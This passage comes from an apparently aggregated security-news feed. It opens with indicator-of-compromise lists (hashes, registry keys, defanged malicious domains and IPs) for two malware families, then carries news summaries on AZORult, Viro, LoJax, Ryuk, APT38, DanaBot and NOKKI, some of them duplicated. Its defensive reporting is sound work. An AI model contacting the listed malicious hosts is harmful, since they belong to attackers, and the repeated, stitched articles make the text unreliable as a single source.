  • cca199364abfb50ec1dd467035fd2c637056abac9f8351393111dcdce8243e38
  • d346a3d9a4be88b2e6fe2b78b391efa47d4de3c9acb23aeb31c0b0e1868d9817
  • da9e5e6a5379284ca1b4e9be680bbecdcbca2378d8d8ae9e76e5601ba4fd9dcc
  • eba22d087a40a79daa58a95e6337f53cf98885400019ad9e8417bb4ce2f2c8ea

Coverage


Screenshots of Detection

AMP



ThreatGrid

Win.Malware.Razy-6703914-0


Indicators of Compromise


Registry Keys
  • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
    • Value Name: internat.exe
  • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
    • Value Name: system
  • <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{4LW407K6-M06A-64Y6-80K0-13CK6KK8U041}
    • Value Name: StubPath
Mutexes
  • -
IP Addresses contacted by malware. Does not indicate maliciousness
  • 217[.]12[.]210[.]23
  • 82[.]205[.]63[.]221
Domain Names contacted by malware. Does not indicate maliciousness
  • extreme33[.]dns1[.]us
  • mdformo[.]ddns[.]net
  • mdformo1[.]ddns[.]net
Files and or directories created
  • N/A
File Hashes
  • 00e3f5ffeb38495cefce0f1c9522743764adf1ee6ce51b91c9c4726726562a12
  • 01a7bdfdc6502db6bd237fcbc64596d8f76052e942c2c87e897f1ae786b7cac2
  • 02c5fa1012b9cf0d46801cadcc4fe6814b4f75d50104e948031d00ff3ca7b93c
  • 035f91568ca2bad43ce3fde98a2ae0418821e5f558c62b919c786c3b07bc0fe2
  • 03970d185025e7e226c704b5bcd13de89730677345d3d57081d07895966567d4
  • 052862be7afd84bbd167be8b83918d828608b35e1423600571747e67e66dbd16
  • 055865fb005e3969e6d9e7feba2e81a8bedbe3048bf2a9cd3a9fbfe8ea6076e5
  • 063e213ee0ecae95132a3cea557203b782de3c63b753fbd405ed670e83fbf573
  • 07912d5cd0bf4ef89355a76c1fc36497e90333111b127dcf07d76cbc8ab76838
  • 081fbe8f1c01676f9765ff7742b5d348433e2fd073136355100fe9f054140e6a
  • 08627d7fbb6313bcdd42ac88152b71f4700dadf0446fb985b269c614bdd3f9af
  • 08c257d2e5938dc6539b463ba0689982b79c112c8ad0aaf1be247726622ea487
  • 092b86ef5f0e69ac5e1d554304189d289f27534fa4c7835ad4137f380a25979b
  • 09c9b81d40f3c97876eaad0f29d7e9694c58c9a9cc4dc38b167611ecfbda3d75
  • 0a032738a8ffc58b6cdce62ef209b247e008f597b6955d87da71e1654da970ef
  • 0a77d603959b51f81cd2b3b27342be0fa4248586ba0121779f1a9959fd701d11
  • 0aa93c8240a9c593d6a8d5c226d4f0b7ac033cef70b39524281c52d92a97fb0a
  • 0afde5386ca8587bca67577727f02c3e71b883b7b5fc72e25a0d542f6c5819c8
  • 0d794619980f35738bd57712d170542d6d8ff58248d21529754a0881c0b139a4
  • 0f4fc18209bbb1d979cb504b807142e1a24aa8ee831e33ce8825a5bd350096fa
  • 0ffca4c710e5af160e813f686181131c963123caaeeea9762f86296822b8c883
  • 10427e9a0ee1b4e3d349d61839e1f09cb86b2a68d23e41933127dd5ce2da0134
  • 1343648c8b4748294191cfdca4b4881a57cee96db4051530c514e7c56e1152e3
  • 1495bb27a646d27162b28bce50ebf25abc5182e7417ced315f1b93060f7e99a0
  • 17983b493cd46b604ef3846516da1cda1628ec855b896be8b54a9558ae83058c

Coverage


Screenshots of Detection

AMP



ThreatGrid



Umbrella


Doc.Malware.Emooodldr-6699885-0


Indicators of Compromise


Registry Keys
  • <HKCR>\LOCAL SETTINGS\MUICACHE\3E\52C64B7E
    • Value Name: LanguageList
  • <HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\PRINT\PRINTERS\Canon PIXMA MG2520\PrinterDriverData
Mutexes
  • Global\552FFA80-3393-423d-8671-7BA046BB5906
  • Local\ZonesCacheCounterMutex
  • Local\ZonesLockedCacheCounterMutex
  • Global\PowerShell_CommandAnalysis_Lock_S-1-5-21-2580483871-590521980-3826313501-500
  • Global\MTX_MSO_AdHoc1_S-1-5-21-2580483871-590521980-3826313501-500
  • Global\MTX_MSO_Formal1_S-1-5-21-2580483871-590521980-3826313501-500
  • Local\10MU_ACB10_S-1-5-5-0-57527
  • Local\10MU_ACBPIDS_S-1-5-5-0-57527
  • Local\WinSpl64To32Mutex_e162_0_3000
  • Local\MSCTF.Asm.MutexDefault1
IP Addresses contacted by malware. Does not indicate maliciousness.
  • N/A
Domain Names contacted by malware. Does not indicate maliciousness.
  • q0fpkblizxfe1l[.]com
Files and or directories created
  • %LocalAppData%\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{B106E8EE-597B-49CA-A6A4-5BA8ABCC8F6A}.tmp
  • %LocalAppData%\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{43E9ADDD-30D5-47E4-98B0-7E3A5536CACC}.tmp
  • %UserProfile%\Documents\20180928
  • %UserProfile%\924.exe
  • %SystemDrive%\TEMP\~$8241024f69edc258237f01170ea088fd5064c5908267e943f97bc9e2a6ea1d.doc
  • %LocalAppData%\Temp\CVR41E8.tmp
  • %LocalAppData%\Temp\~DFD053DCDB50AFFE51.TMP
  • %LocalAppData%\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{0EF83731-611B-4C55-980D-4D5CFC5BF353}.tmp
  • %AppData%\Microsoft\Office\Recent\5f8241024f69edc258237f01170ea088fd5064c5908267e943f97bc9e2a6ea1d.LNK
  • \TEMP\~$8241024f69edc258237f01170ea088fd5064c5908267e943f97bc9e2a6ea1d.doc
  • %LocalAppData%\Temp\bdmwft0z.slp.ps1
  • %LocalAppData%\Temp\tjkn23yi.53a.psm1
  • %UserProfile%\Documents\20180928\PowerShell_transcript.PC.ceUgAgR5.20180928074741.txt
File Hashes
  • 06f0ec25e8b014b407402207afa8b6c0db494ad270d910534399c2137204e81b
  • 0a8d4f2ac74485345284950b158da4be071633f33b0c7b9fa18d1f3e4d28732e
  • 292b28d2f08fbd08ee8f1c2ed6f765b08c883031c0fae8dd84480ba0e1ca940d
  • 3371fc7b0cf2d389571002c3ca26c9268edc373b79486e47bd6c349120f560c2
  • 33d078881456e3b930c480803902fa28142b17c8550f3932e7cf4a1df0eb9213
  • 567fe3794a9eec27697ae0634861d284279261880887f60a7374c6cbe63b7674
  • 5f8241024f69edc258237f01170ea088fd5064c5908267e943f97bc9e2a6ea1d
  • 91f0264ea76628c6b8825f358cd9cb8e1255604108fc059e0ac283d49c0dd852
  • 933f5c822937fdec9325d1c99c5e0a5fda92296ef7c51ce7cd2dfc72bbe95b82
  • cf8f98b1adf802ed2b24345161a38c4cfa499b36f17b0466a1da74edce84ba4b
  • e469ba3bad870a5e7596035f69f2ba4cbb849cbdf9a8019890ccdea02c60e4d6
  • f368d4a10770c42316d9c1024a0894b85048020526be03b2e824165b5b66e978
  • f88ef62f2342f4d1105cfe85395b735efd3f0308b79551944983ce245d425510

Coverage


Screenshots of Detection

AMP



ThreatGrid



Umbrella


Gazorp Malware Builder Offers Free, Customized AZORult Attacks on the Dark Web

Gazorp, a free malware builder spotted on the dark web, lets would-be threat actors create customized AZORult attacks.

First discovered by Check Point Research on Sept. 17, the new builder makes it easy to generate custom samples of the AZORult infostealer. According to Gazorp’s creators, developing malware with the tool is “as simple as 2×2”: Prospective users provide their command-and-control (C&C) address, download the malware builder, install the panel and deploy their new creation in the wild.

Gazorp builds samples of AZORult version 3.0, which was released five months ago. Since that time, two newer versions — 3.1 and 3.2 — have been released, limiting the efficacy of Gazorp’s version. As Check Point made clear, however, the outdated version has “multiple stealing capabilities which can be leveraged by any actor to gather victim information and misuse it.”

Gazorp’s Expanding Threat Capabilities

Gazorp’s authors have added several new panel features and code upgrades to boost the impact of their AZORult version. Notable improvements include the addition of a global heat map that provides country-by-country statistics and the ability to create a complex mutex based on multiple factors, including admin, user, system and guest authorities. In addition, this Gazorp version includes vulnerability and bug fixes to version 3.0, along with visual user interface (UI) enhancements.

But that’s not all. The malware builder also includes a Telegram channel link that features the ongoing work of Gazorp’s authors. Users who visit the channel can get updates on new features, add their own suggestions and donate bitcoin to help drive future improvements. The creators made it clear: “More donations, more updates.” According to Check Point, it appears the project will evolve over time and “possibly produce new variants for AZORult.”

How to Protect Enterprise Data From a Malware Builder

Tackling the problem of custom malware code starts with consistent patching. Security experts note that “the bulk of security issues simply come down to software patching,” and this is certainly the case with Gazorp. Given its use of outdated AZORult code, regular security patching will frustrate most free-to-play malware attackers.

Security teams should also consider investing in security-as-a-service (SECaaS) solutions. Check Point noted that new Gazorp attacks may begin to emerge at a higher scale as more attackers discover the service. Attempting to track evolving, emerging infections without the benefit of on-demand security resources quickly becomes an exercise in frustration — and could lead to network compromise.

Source: Check Point Research

The post Gazorp Malware Builder Offers Free, Customized AZORult Attacks on the Dark Web appeared first on Security Intelligence.

China accused of sabotaging thousands of servers at major US companies with tiny microchips hidden on motherboards

Bloomberg thumb

An extraordinary report released by Bloomberg BusinessWeek, which claims that China has been exploiting the supply-chain, planting a tiny microchip on servers which ended up in the server rooms of almost 30 companies, including the likes of Apple and Amazon.

Viro Botnet Uses Spamming and Keylogging Capabilities to Spread Ransomware

Security researchers observed a new attack campaign in which the Viro botnet infects devices with ransomware and then uses those compromised machines to infect more victims.

Once downloaded, according to Trend Micro, Viro quickly generates encryption and decryption keys with a random number generator after scanning the infected device for the right registry. Interestingly, although the botnet is aimed primarily at Americans, the attack displays a ransom note in French after successfully encrypting files using RSA.

Viro first made headlines when it was discovered in the wild in late 2017.

Viro’s Expanded Spamming and Keylogging Capabilities

While early examples of ransomware simply held data hostage until victims paid up, the recent Viro attacks involve additional capabilities, such as penetrating users’ email systems and contact lists to spam other potential victims.

Its keylogging capabilities, meanwhile, allow cybercriminals to harvest other data, which was then sent back to a command-and-control (C&C) server to download additional malware or other files. The researchers speculated that Viro may be based on a variant of Locky, which made headlines throughout 2017.

On the plus side, the researchers noted that Viro’s C&C server had been taken down since they first observed the attacks — meaning it will no longer be able to encrypt files even if it lands on a victim’s machine.

How to Avoid Botnet-Borne Ransomware Attacks

Ransomware attacks like Viro often start when someone innocently clicks on an email attachment that triggers the download process. IBM experts advise security teams to restrict the execution of programs from temporary folders where malware files commonly reside. This is usually just a matter of leveraging common Software Restriction Policies (SRPs) and Group Policy Objects (GPOs) that are already available within security tools, which would block attempts by cybercriminals to copy malicious payloads from a temporary folder.

Threat actors may also aim ransomware at AppData or Local AppData folders. Organizations can keep ransomware at bay by turning off the ability to launch executables in these areas.

Source: Trend Micro

The post Viro Botnet Uses Spamming and Keylogging Capabilities to Spread Ransomware appeared first on Security Intelligence.

Sednit APT Group Uses First UEFI Rootkit Detected in the Wild to Execute LoJax Malware

For the first time ever, researchers discovered a Unified Extensible Firmware Interface (UEFI) rootkit in the wild that they believe the Sednit advanced persistent threat (APT) group used to execute LoJax malware.

Researchers at ESET observed an attack campaign distributing LoJax and three types of tools. The first component dumped system information into a text file. The second tool read the contents of the Serial Peripheral Interface (SPI) flash memory to save an image of the system’s firmware. The third wrote a UEFI module to the SPI flash memory and installed a UEFI rootkit that’s responsible for dropping LoJax onto the machine.

All Signs Point to Sednit

LoJax is a Trojanized version of LoJack, antitheft software that uses a UEFI and Basic Input/Output System (BIOS) module to help it resist operating system (OS) reinstallations and hard drive replacements. LoJax uses this same persistence method but calls to a malicious command-and-control (C&C) server.

ESET recognized some of the domains used by LoJax as those employed by SedUploader, the first-stage backdoor of Sednit. This discovery, along with other evidence, led ESET to attribute the campaign and UEFI rootkit to the APT group.

The UEFI rootkit used to distribute LoJax may be the first of its kind discovered in the wild, but researchers have uncovered others like it outside of active attack campaigns. Back in 2015, McAfee found a UEFI-based rootkit in the Hacking Team data breach. Individuals have also disclosed proof-of-concept UEFI rootkits on YouTube.

How to Defend Against LoJax Malware and UEFI Rootkits

According to ESET, organizations can defend themselves against LoJax malware and UEFI rootkits by enabling Secure Boot. The researchers also urged security teams to use the latest UEFI/BIOS available for their motherboard. Updating UEFI/BIO can result in performance degradation, so security professionals should consult their application vendors to determine the potential impact to their environments.

Sources: ESET, McAfee, YouTube

The post Sednit APT Group Uses First UEFI Rootkit Detected in the Wild to Execute LoJax Malware appeared first on Security Intelligence.

Canadian restaurant chain Recipe suffered a network outage, is it a ransomware attack?

The Canadian restaurant chain Recipe Unlimited that operates over 20 restaurant brands has suffered a major IT outage over the weekend in a “malware outbreak.”

The company operates nearly 1,400 restaurants under 19 different brands in Canada,

Recipe Unlimited has suffered a major malware-based attack that impacted several of its brands.

On Monday the company Monday confirmed that a malware is the root cause of a partial network outage at nine of its franchises, including Swiss Chalet, Harvey’s, East Side Mario’s, and Kelseys.

Recipe discovered the malware outbreak on September 28 and immediately started the incident response procedure. A number of systems have been taken offline, and all the locations infected by the ransomware were isolated from the Internet.

The affected locations continued to process card transactions manually,

The infections have caused the closure of a “small number” of restaurants for a “temporary period of time.”

“A limited number of Recipe Unlimited restaurants are currently experiencing a partial network outage. Only certain restaurants under the Swiss Chalet, Harvey’s, Milestones, KelseysMontana’s, Bier Markt, East Side Mario’s, The Landing Group of Restaurants and Prime Pubs brands have been impacted.” reads a statement published by the company.

“We learned of the malware outbreak on Friday, September 28 and immediately initiated steps to prevent any further spread and take appropriate precautionary measures. As a result, we have taken a number of our systems offline and suspended internet access to affected locations as a precaution. This caused some of our restaurants to experience some service delay related issues, including being unable to process credit and debit card transactions. However, all of those restaurants are able to manually process credit card charges. A smaller number of affected restaurants have decided to close for a temporary period of time to avoid inconvenience to guests due to service issues.”

According to the CBC News, the Recipe was the victim of a ransomware attack, the media also shared a copy of a ransom note that was provided by a worker at one of the affected restaurants.

“All of our computer systems crashed,” said a worker on shift at the time at an affected location. “The ransom note appeared under the file, ‘read me‘ in a WordPad format. We were all really in a state of shock.”

The hackers claim that they encrypted the files using “the strongest military algorithms,” at the time there is no info related to an amount of bitcoin requested to the victims.

The amount requested by the crooks will increase with the time.

“The final price depends on how fast you write to us,” warns the ransom note. “Every day of delay will cost you additional +0.5 BTC.”

Recipe Unlimited denies it was victim of a ransomware attac, because it conducts regular system backups to promptly mitigate such kind of attacks.

“We maintain appropriate system and data security measures,” said spokesperson Maureen Hart in an email.

Canadian restaurant chain Recipe

According to Hart, the ransom note published online is a “generic” statement associated with a virus called Ryuk, and other copies of the note can be found via a Google search.

The ransom note is associated with Ryuk ransomware, a threat discovered by security experts at Check Point in August. At the time, the ransomware-based campaign aimed at organizations around the world conducted by North Korea-linked threat actor.

The campaign appears as targeted and well-planned, crooks targeted several enterprises and encrypted hundreds of PC, storage and data centers in each infected company.

Pierluigi Paganini

(Security Affairs – Recipe, ransomware)

The post Canadian restaurant chain Recipe suffered a network outage, is it a ransomware attack? appeared first on Security Affairs.

Fortnite players beware: New data stealing malware disguised as cheat tool

By Waqas

Popular video game Fortnite’s new season is here and so begins the season of malware scamming for cybercriminals. Unsurprisingly, Malwarebytes Labs has reported that scammers are trying their best to come up with a fake version of the game to con the users. However, their current attempts cannot be termed as a mere con attack […]

This is a post from HackRead.com Read the original post: Fortnite players beware: New data stealing malware disguised as cheat tool

Cyber Defense Magazine Annual Global Edition for 2018 has arrived. Enjoy it!

We hope you enjoy our Cyber Defense Magazine Annual Global Edition for 2018 including our Global Awards Winners for 2018…packed with over 75+ pages of excellent content.

Cyber Defense Magazine

Global Edition for 2018 has arrived.

Global Awards Winners Announced!

Sponsored By: TrendMicro

cyber defense emagazine global

 

InfoSec Knowledge is Power.  We have 6 years of eMagazines online with timeless content.  Visit our online library by clicking here.   Please tell your friends to

subscribe – no strings, always free emagazines:

 

Our Global Awards are annually given out at the IPEXPO EUROPE Conference as a global event in Europe every year, Q4.  GLOBAL 2018 Awards have arrived – Winners are listed here:  https://www.cyberdefensemagazine.com/cdga-winners-2018/

Our InfoSec awards are annually given out at the RSA Conference in the United States every year, Q1.  USA 2019 Awards – OPENING SOON!

MAGAZINES        TV        AWARDS  with our upcoming platform coming soon….

Sincerely,
TEAM CDM
Cyber Defense Magazine

 

We are all things Cyber Defense.  Thank you to our amazing readership!

Don’t forget to visit www.cyberdefense.tv – watch, learn & grow.

Pierluigi Paganini

(Security Affairs – hacking, Cyber Defense Magazine)

The post Cyber Defense Magazine Annual Global Edition for 2018 has arrived. Enjoy it! appeared first on Security Affairs.

Security Affairs: Cyber Defense Magazine Annual Global Edition for 2018 has arrived. Enjoy it!

We hope you enjoy our Cyber Defense Magazine Annual Global Edition for 2018 including our Global Awards Winners for 2018…packed with over 75+ pages of excellent content.

Cyber Defense Magazine

Global Edition for 2018 has arrived.

Global Awards Winners Announced!

Sponsored By: TrendMicro

cyber defense emagazine global

 

InfoSec Knowledge is Power.  We have 6 years of eMagazines online with timeless content.  Visit our online library by clicking here.   Please tell your friends to

subscribe – no strings, always free emagazines:

 

Our Global Awards are annually given out at the IPEXPO EUROPE Conference as a global event in Europe every year, Q4.  GLOBAL 2018 Awards have arrived – Winners are listed here:  https://www.cyberdefensemagazine.com/cdga-winners-2018/

Our InfoSec awards are annually given out at the RSA Conference in the United States every year, Q1.  USA 2019 Awards – OPENING SOON!

MAGAZINES        TV        AWARDS  with our upcoming platform coming soon….

Sincerely,
TEAM CDM
Cyber Defense Magazine

 

We are all things Cyber Defense.  Thank you to our amazing readership!

Don’t forget to visit www.cyberdefense.tv – watch, learn & grow.

Pierluigi Paganini

(Security Affairs – hacking, Cyber Defense Magazine)

The post Cyber Defense Magazine Annual Global Edition for 2018 has arrived. Enjoy it! appeared first on Security Affairs.



Security Affairs

APT38: Details on New North Korean Regime-Backed Threat Group

Today, we are releasing details on the threat group that we believe is responsible for conducting financial crime on behalf of the North Korean regime, stealing millions of dollars from banks worldwide. The group is particularly aggressive; they regularly use destructive malware to render victim networks inoperable following theft. More importantly, diplomatic efforts, including the recent Department of Justice (DOJ) complaint that outlined attribution to North Korea, have thus far failed to put an end to their activity. We are calling this group APT38.

We are releasing a special report, APT38: Un-usual Suspects, to expose the methods used by this active and serious threat, and to complement earlier efforts by others to expose these operations, using FireEye’s unique insight into the attacker lifecycle.

We believe APT38’s financial motivation, unique toolset, and tactics, techniques and procedures (TTPs) observed during their carefully executed operations are distinct enough to be tracked separately from other North Korean cyber activity. There are many overlapping characteristics with other operations, known as “Lazarus” and the actor we call TEMP.Hermit; however, we believe separating this group will provide defenders with a more focused understanding of the adversary and allow them to prioritize resources and enable defense. The following are some of the ways APT38 is different from other North Korean actors, and some of the ways they are similar:

  • We find there are clear distinctions between APT38 activity and the activity of other North Korean actors, including the actor we call TEMP.Hermit. Our investigation indicates they are disparate operations against different targets and reliance on distinct TTPs; however, the malware tools being used either overlap or exhibit shared characteristics, indicating a shared developer or access to the same code repositories. As evident in the DOJ complaint, there are other shared resources, such as personnel who may be assisting multiple efforts.
  • A 2016 Novetta report detailed the work of security vendors attempting to unveil tools and infrastructure related to the 2014 destructive attack against Sony Pictures Entertainment. This report detailed malware and TTPs related to a set of developers and operators they dubbed “Lazarus,” a name that has become synonymous with aggressive North Korean cyber operations.
    • Since then, public reporting attributed additional activity to the “Lazarus” group with varying levels of confidence primarily based on malware similarities being leveraged in identified operations. Over time, these malware similarities diverged, as did targeting, intended outcomes and TTPs, almost certainly indicating that this activity is made up of multiple operational groups primarily linked together with shared malware development resources and North Korean state sponsorship.

Since at least 2014, APT38 has conducted operations in more than 16 organizations in at least 13 countries, sometimes simultaneously, indicating that the group is a large, prolific operation with extensive resources. The following are some details about APT38 targeting:

  • The total number of organizations targeted by APT38 may be even higher when considering the probable low incident reporting rate from affected organizations.
  • APT38 is characterized by long planning, extended periods of access to compromised victim environments preceding any attempts to steal money, fluency across mixed operating system environments, the use of custom developed tools, and a constant effort to thwart investigations capped with a willingness to completely destroy compromised machines afterwards.
  • The group is careful, calculated, and has demonstrated a desire to maintain access to a victim environment for as long as necessary to understand the network layout, required permissions, and system technologies to achieve its goals.
  • On average, we have observed APT38 remain within a victim network for approximately 155 days, with the longest time within a compromised environment believed to be almost two years.
  • In just the publicly reported heists alone, APT38 has attempted to steal over $1.1 billion dollars from financial institutions.

Investigating intrusions of many victimized organizations has provided us with a unique perspective into APT38’s entire attack lifecycle. Figure 1 contains a breakdown of observed malware families used by APT38 during the different stages of their operations. At a high-level, their targeting of financial organizations and subsequent heists have followed the same general pattern:

  1. Information Gathering: Conducted research into an organization’s personnel and targeted third party vendors with likely access to SWIFT transaction systems to understand the mechanics of SWIFT transactions on victim networks (Please note: The systems in question are those used by the victim to conduct SWIFT transactions. At no point did we observe these actors breach the integrity of the SWIFT system itself.).
  2. Initial Compromise: Relied on watering holes and exploited an insecure out-of-date version of Apache Struts2 to execute code on a system.
  3. Internal Reconnaissance: Deployed malware to gather credentials, mapped the victim’s network topology, and used tools already present in the victim environment to scan systems.
  4. Pivot to Victim Servers Used for SWIFT Transactions: Installed reconnaissance malware and internal network monitoring tools on systems used for SWIFT to further understand how they are configured and being used. Deployed both active and passive backdoors on these systems to access segmented internal systems at a victim organization and avoid detection.
  5. Transfer funds: Deployed and executed malware to insert fraudulent SWIFT transactions and alter transaction history. Transferred funds via multiple transactions to accounts set up in other banks, usually located in separate countries to enable money laundering.
  6. Destroy Evidence: Securely deleted logs, as well as deployed and executed disk-wiping malware, to cover tracks and disrupt forensic analysis.


Figure 1: APT38 Attack Lifecycle

APT38 is unique in that it is not afraid to aggressively destroy evidence or victim networks as part of its operations. This attitude toward destruction is probably a result of the group trying to not only cover its tracks, but also to provide cover for money laundering operations.

In addition to cyber operations, public reporting has detailed recruitment and cooperation of individuals in-country to support with the tail end of APT38’s thefts, including persons responsible for laundering funds and interacting with recipient banks of stolen funds. This adds to the complexity and necessary coordination amongst multiple components supporting APT38 operations.

Despite recent efforts to curtail their activity, APT38 remains active and dangerous to financial institutions worldwide. By conservative estimates, this actor has stolen over a hundred million dollars, which would be a major return on the likely investment necessary to orchestrate these operations. Furthermore, given the sheer scale of the thefts they attempt, and their penchant for destroying targeted networks, APT38 should be considered a serious risk to the sector.

NotPetya Horror Story Highlights Need for Holistic Security

The NotPetya malware’s ability to cripple even sophisticated, global firms is a cautionary tale about the need for businesses to understand their risk and take a holistic view of security says Fadi Albatal, Chief Strategy Officer at Hitachi Systems Security.* If you’re keen on information security and happen to enjoy horror stories, point...

Read the whole entry... »

Related Stories

Network Outage at Some Recipe Unlimited Locations Caused by Malware

A malware outbreak was responsible for a network outage that affected a limited number of Recipe Unlimited restaurant locations. On 1 October, Recipe Unlimited announced a malware attack of which it learned at the end of September. The Canadian restaurant chain owner and food distributor said in a statement that it responded by taking certain […]… Read More

The post Network Outage at Some Recipe Unlimited Locations Caused by Malware appeared first on The State of Security.

New Danabot Banking Malware campaign now targets banks in the U.S.

According to malware researchers from Proofpoint, DanaBot attackers launched a new campaign aimed at banks in the United States.

A couple of weeks ago, security experts at ESET observed a surge in activity of DanaBot banking Trojan that was targeting Poland, Italy, Germany, Austria, and as of September 2018, Ukraine.

DanaBot is a multi-stage modular banking Trojan written in Delphi, the malware allows operators to add new functionalities by adding new plug-ins.

When it was analyzed by Proofpoint, its experts speculated the threat has been under active development.

The banking Trojan initially targeted Australia and Poland users, then it has expanded in other countries, including Italy, Germany, Austria, and as of September 2018, Ukraine.

According to Proofpoint, now DanaBot attackers launched a new campaign aimed at banks in the United States as well. Experts monitored different campaigns using a different ID found in server communications, a circumstance that suggests the DanaBot is being offered through the malware-as-a-service model.

ProofPoint has identified 9 different actors distributing the Trojan to a specific region,  experts highlighted that only Australia was targeted by two different groups of attackers.

“Based on distribution methods and targeting, we have been grouping DanaBot activity using an “affiliate ID” that we have observed in various part of the C&C protocol (e.g., offset 0xc of the 183-byte binary protocol header). ” reads the report published by ProofPoint.

The campaign against North America uses spam messages that pretend to be digital faxes from eFax received by the recipients.

Danabot Banking Malware

When the recipient clicks on the download button included in the content of the message, it will download a weaponized Word document that poses as an eFax.

Is the recipient enables the macros to properly view the fax, the malicious code executes the embedded Hancitor malware that downloads two versions of Pony stealer and the DanaBot banking malware

“The emails used an eFax lure (Figure 1) and contained a URL linking to the download of a document containing malicious macros (Figure 2). The macros, if enabled by the user, executed the embedded Hancitor malware [3], which, in turn, received tasks to download two versions of Pony stealer and the DanaBot banking malware.” continue the analysis.

Experts from Proofpoint highlighted that each affiliate id is utilizing different distribution methods, some actors leverage the Fallout Exploit Kit, others web injects or malspam campaigns. Researchers also found similarities between how DanaBot and the CryptXXX Ransomware that was using a custom command and control protocol on TCP port 443.

Proofpoint speculates DanaBot’s C&C traffic is an evolution of this protocol that uses AES encryption in addition to the Zlib compression.

The researchers believe that the developers created DanaBot as part of an evolution of CryptXXX.

“Thus it would seem that Danabot follows in a long line of malware from one particular group. This family began with ransomware, to which stealer functionality was added in Reveton.” concludes Proofpoint.

“The evolution continued with CryptXXX ransomware and now with a banking Trojan with Stealer and remote access functionality added in Danabot.”

Pierluigi Paganini

(Security Affairs – DanaBot, hacking)

The post New Danabot Banking Malware campaign now targets banks in the U.S. appeared first on Security Affairs.

Researchers associated the recently discovered NOKKI Malware to North Korean APT

Security experts from Palo Alto Networks have collected evidence that links the recently discovered NOKKI malware to North Korea-Linked APT.

Researchers from Palo Alto Networks have spotted a new variant of the KONNI malware, tracked as NOKKI. that was attributed to North Korea-linked attackers.

NOKKI borrows the code from the KONNI malware, the latter is a remote access Trojan (RAT) used in targeted attacks on organizations linked to North Korea, while NOKKI was used to target politically-motivated victims in Eurasia and Southeast Asia.

KONNI,” was undetected for more than 3 years, it was able to avoid detection due to a continuous evolution, the recent versions capable of executing arbitrary code on the target systems and stealing data.

The NOKKI variant has been in use since at least January 2018, experts attributed it to the Reaper group.

“Beginning in early 2018, Unit 42 observed a series of attacks using a previously unreported malware family, which we have named ‘NOKKI’.” reads the analysis published by the Palo Alto Networks.

“The malware in question has ties to a previously reported malware family named KONNI, however, after careful consideration, we believe enough differences are present to introduce a different malware family name. To reflect the close relationship with KONNI, we chose NOKKI, swapping KONNI’s Ns and Ks.”

NOKKI is able to gather a broad range of data (i.e. IP address, Hostname, Username, Drive Information, Operating System Information, Installed Programs) from the infected systems, it is also able to fetch and execute a payload, as well as to drop and open decoy documents.

The malicious code writes the collected information to LOCALAPPDATA%\MicroSoft Updatea\uplog.tmp.

In January, the researchers observed several attacks involving the NOKKI malware that targeted Cambodian speakers with an interest in Cambodian political matters and Russia with documents written Cyrillic featuring content related to local political issues.

A few days ago, researchers from Palo Alto Networks published another report that associated the NOKKI malware with the DOGCALL backdoor attributed to the Reaper group.

 

The analysis of the macros included in the Microsoft Word decoy documents revealed that they were designed to drop the NOKKI malware, they employed a deobfuscation technique that was also used in documents targeting individuals interested in the World Cup hosted in Russia in 2018 with the DOGCALL malware.

“Based on the original filename, we can surmise this malware sample targeted individuals interested in the World Cup hosted in Russia in 2018. As we can see in the figure below, the unique deobfuscation routine used between the samples is identical, including the comments included by the author.” reads the report published by Palo Alto Networks.

NOKKI vs WordCup malware

“While the deobfuscation routine was identical, the actual functionality of the macro differed slightly. The NOKKI dropper samples downloaded both a payload and a decoy document, but this World Cup predictions malware sample downloads and executes a remote VBScript file wrapped in HTML and appends text to the original Word document to provide the lure for the victim.”

The VBScript file used the same deobfuscation routine and fetches and executes a dropper tracked as Final1stspy that in turn downloads a strain of the DOGCALL malware.

The malware implements backdoor features, can take screenshots, log keystrokes, enable the microphone, collect victim information, collect files of interest, and download and execute additional payloads.

The malware connects the command and control (C&C) via third-party hosting services such as Dropbox, pCloud, Yandex Cloud, and Box.

“What originally began as research surrounding a new malware family named NOKKI that had code overlap and other ties to KONNI lead us to an interesting discovery tying the NOKKI malware family to the Reaper threat actor group.” Palo Alto Networks concludes.

“Additionally, we discovered yet another malware family that has not been previously publicly reported that we have named Final1stspy,” 

Pierluigi Paganini

(Security Affairs – NOKKI malware, North Korea)

The post Researchers associated the recently discovered NOKKI Malware to North Korean APT appeared first on Security Affairs.

Security Affairs: Researchers associated the recently discovered NOKKI Malware to North Korean APT

Security experts from Palo Alto Networks have collected evidence that links the recently discovered NOKKI malware to North Korea-Linked APT.

Researchers from Palo Alto Networks have spotted a new variant of the KONNI malware, tracked as NOKKI. that was attributed to North Korea-linked attackers.

NOKKI borrows the code from the KONNI malware, the latter is a remote access Trojan (RAT) used in targeted attacks on organizations linked to North Korea, while NOKKI was used to target politically-motivated victims in Eurasia and Southeast Asia.

KONNI,” was undetected for more than 3 years, it was able to avoid detection due to a continuous evolution, the recent versions capable of executing arbitrary code on the target systems and stealing data.

The NOKKI variant has been in use since at least January 2018, experts attributed it to the Reaper group.

“Beginning in early 2018, Unit 42 observed a series of attacks using a previously unreported malware family, which we have named ‘NOKKI’.” reads the analysis published by the Palo Alto Networks.

“The malware in question has ties to a previously reported malware family named KONNI, however, after careful consideration, we believe enough differences are present to introduce a different malware family name. To reflect the close relationship with KONNI, we chose NOKKI, swapping KONNI’s Ns and Ks.”

NOKKI is able to gather a broad range of data (i.e. IP address, Hostname, Username, Drive Information, Operating System Information, Installed Programs) from the infected systems, it is also able to fetch and execute a payload, as well as to drop and open decoy documents.

The malicious code writes the collected information to LOCALAPPDATA%\MicroSoft Updatea\uplog.tmp.

In January, the researchers observed several attacks involving the NOKKI malware that targeted Cambodian speakers with an interest in Cambodian political matters and Russia with documents written Cyrillic featuring content related to local political issues.

A few days ago, researchers from Palo Alto Networks published another report that associated the NOKKI malware with the DOGCALL backdoor attributed to the Reaper group.

 

The analysis of the macros included in the Microsoft Word decoy documents revealed that they were designed to drop the NOKKI malware, they employed a deobfuscation technique that was also used in documents targeting individuals interested in the World Cup hosted in Russia in 2018 with the DOGCALL malware.

